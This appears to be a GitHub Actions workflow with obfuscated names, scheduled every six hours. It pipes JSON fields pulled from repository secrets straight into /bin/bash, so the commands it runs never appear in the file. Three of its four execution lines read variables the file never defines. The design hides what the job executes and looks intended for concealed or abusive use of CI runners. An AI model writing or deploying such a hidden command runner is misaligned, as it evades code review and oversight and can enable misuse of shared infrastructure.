name: jixiaxingliang
on:
  workflow_dispatch:
  schedule:
    - cron: '6 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jixiaxingliang
        env:
          yn424: ${{ secrets.yn424 }}
        run: |
          echo $yn424 | jq -r .vo1 | /bin/bash
          echo $zroi12760 | jq -r .wdvsx74787 | /bin/bash
          echo $li49 | jq -r .aypb58743 | /bin/bash
          echo $xryum04 | jq -r .n80 | /bin/bash

